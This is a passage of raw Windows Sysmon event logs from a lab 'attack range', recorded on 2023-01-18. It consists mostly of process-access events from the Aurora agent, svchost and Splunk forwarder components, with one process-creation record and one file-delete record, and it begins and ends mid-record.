Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.726{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.725{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.721{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000046000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.554{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D28FF75A7475AF10D78E470537CEA07,SHA256=C48D011AFAFC3B67F2B16DEF232CF094B9B40A7B5241E52E93544ABC45C0102D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018344Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5F2-63C7-3402-00000000B002}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018343Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018342Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018341Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018340Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018339Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018338Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018337Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018336Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018335Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018334Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E5F2-63C7-3402-00000000B002}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018333Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.107{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5F2-63C7-3402-00000000B002}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018332Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:34.108{E5A8D418-E5F2-63C7-3402-00000000B002}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.207{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000045998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:34.206{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000018346Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:35.839{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 